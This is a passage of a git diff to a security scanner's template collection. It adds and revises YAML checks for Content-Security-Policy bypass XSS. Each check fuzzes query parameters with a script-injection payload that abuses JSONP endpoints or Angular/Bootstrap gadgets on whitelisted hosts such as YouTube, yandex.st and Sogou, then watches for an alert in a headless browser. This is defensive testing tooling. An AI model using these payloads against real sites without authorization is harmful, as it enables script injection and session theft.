+    matchers:
+      - type: dsl
+        dsl:
+          - "yahoo_ads_yap_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml
new file mode 100644
index 00000000000..a78fd01c02e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yandex-st-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yandex ST
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yandex
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://yandex.st/jquery/1.8.2/jquery.min.js"></script><script src="https://yandex.st/bootstrap/3.0.3/js/bootstrap.min.js"></script><button data-toggle="modal" data-target="$('head').html('<script>alert(1)</script>')">Test XSS</button>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: yandex_st_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "yandex_st_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
deleted file mode 100644
index 0e02b5cfb9b..00000000000
--- a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: youku-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via Youku ACS
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,youku
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://acs.youku.com/h5/mtop.youku.playlog.open.get/1.0/?jsv=2.6.1&appKey=24679788&t=1734359327631&sign=6b8f8b6abb27c68582606eed336c887d&api=mtop.youku.playlog.open.get&v=1.0&dataType=jsonp&jsonpIncPrefix=headerRecord1734359327618&type=jsonp&callback=alert&data={%22nlid%22%3A%22XlQcF5xQrCcCAWoLKdGqIOhS%22%2C%22uid%22%3A%22%22%2C%22pageLength%22%3A100%2C%22timestamp%22%3A%221734359327617%22%2C%22appKey%22%3A%22qPbb2hfIYugHjMaj%22%2C%22appName%22%3A%22pc%22%2C%22hwClass%22%3A1%2C%22deviceName%22%3A%22web%22%2C%22isPlayController%22%3A1%2C%22ccode%22%3A%220502%22%2C%22clientDrmAbility%22%3A3}"></script>'
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{url_encode(injection)}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "acs.youku.com"
-          - "script-src"
-        condition: and
diff --git a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
index 215f995b85c..436526cd83f 100644
--- a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
@@ -1,12 +1,11 @@
 id: youtube-csp-xss
 
 info:
-  name: Content-Security-Policy Bypass via Youtube
-  author: DhiyaneshDK
-  severity: high
+  name: Content-Security-Policy Bypass via YouTube
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://infosecwriteups.com/riding-the-waves-of-api-versioning-unmasking-a-stored-xss-vulnerability-bypassing-csp-using-c039c10df2b1
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L206C17-L206C89
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,youtube
@@ -19,14 +18,14 @@ http:
 
     payloads:
       injection:
-        - '<script src="https://www.youtube.com/oembed?callback=alert(1)"></script>'
+        - '<script src="https://www.youtube.com/iframe_api?callback=alert"></script>'
 
     fuzzing:
       - part: query
         type: replace
         mode: single
         fuzz:
-          - "{{injection}}"
+          - "{{url_encode(injection)}}"
 
     matchers-condition: and
     matchers:
@@ -34,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "www.youtube.com"
-          - "script-src"
-        condition: and
+      - action: waitload
+
+      - action: waitdialog
+        name: youtube_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "youtube_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml
new file mode 100644
index 00000000000..65067a2cc57
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yuedust-yuedu-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yuedust Yuedu
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yuedust
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="//yuedust.yuedu.126.net/js/components/angular/angular.js"></script><div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == \'window\'">{{ [1].reduce(value.alert, 1); }}</div></div></div></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: yuedust_yuedu_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "yuedust_yuedu_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
new file mode 100644
index 00000000000..e953ae350af
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yugiohmonstrosdeduelo-blogspot-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yugioh Blogspot
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,blogspot
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://yugiohmonstrosdeduelo.blogspot.com/feeds/posts/summary?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: yugiohmonstrosdeduelo_blogspot_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "yugiohmonstrosdeduelo_blogspot_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
new file mode 100644
index 00000000000..8d8f05a9bfd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhike-help-360-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Zhike Help 360
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,zhike
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://zhike.help.360.cn/api/v1/robotWindow?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: zhike_help_360_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "zhike_help_360_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
new file mode 100644
index 00000000000..deea2df08e2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhuanjia-sogou-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Zhuanjia Sogou
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,zhuanjia
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://zhuanjia.sogou.com/base/ajax/login/login-init?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: zhuanjia_sogou_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "zhuanjia_sogou_csp_xss == true" 
\ No newline at end of file